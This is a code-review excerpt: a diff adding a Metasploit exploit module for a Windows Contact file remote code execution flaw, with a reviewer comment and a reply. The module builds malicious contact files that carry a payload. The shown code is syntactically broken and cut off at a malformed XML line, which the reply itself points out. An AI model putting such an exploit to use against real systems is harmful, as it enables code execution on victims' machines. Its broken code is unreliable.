modules/exploits/windows/fileformat/microsoft_windows_contact_remote_code_execution.rb

```diff
@@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Microsoft Windows CONTACT - Remote Code Execution Execution',
+      'Description' => %q{
+        This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
+        User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+      },
+      'Author'      =>
+        [ 'John Page (aka hyp3rlinx)', # Vuln discovery
+          'Brenner Little' # MSF module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['EDB', '46188']
+        ],
+      'DisclosureDate' => 'Jan 17 2019', # According to https://www.exploit-db.com/exploits/46188
+      'Privileged'     => false,
+      'Platform'       => 'win',
+      'Payload'        => {
+        'DisableNops' => true
+      },
+      'DefaultOptions' => {
+        'DisablePayloadHandler' => true
+      'Targets'        => [['Windows', { }]],
+      'DefaultTarget'  => 0
+      ))
+      register_options(
+      [
+        OptString.new('FILENAME', [false, 'The name of the malicious payload to execute', 'msf.com']),
+        OptString.new('ContactName', [false, 'The name of the Contact File', 'John Smith'])
+      ])
+  end
+  def exploit
+    require 'fileutils'
+    contactname = "#{datastore['Contactname']}"
+    test = contactname
+    exename = "#{datastore['FILENAME']}"
+    xml = | << ? xml version = "1.0"
```

Comment:
This could be a bit prettier. Try using `%q{xmldata}` format.

Reply:
The XML is malformed. It was correctly formed in 16874b00d38582fb5f0ae67dbf863b291ecb0f4a; but seems to have been corrupted in the following commits.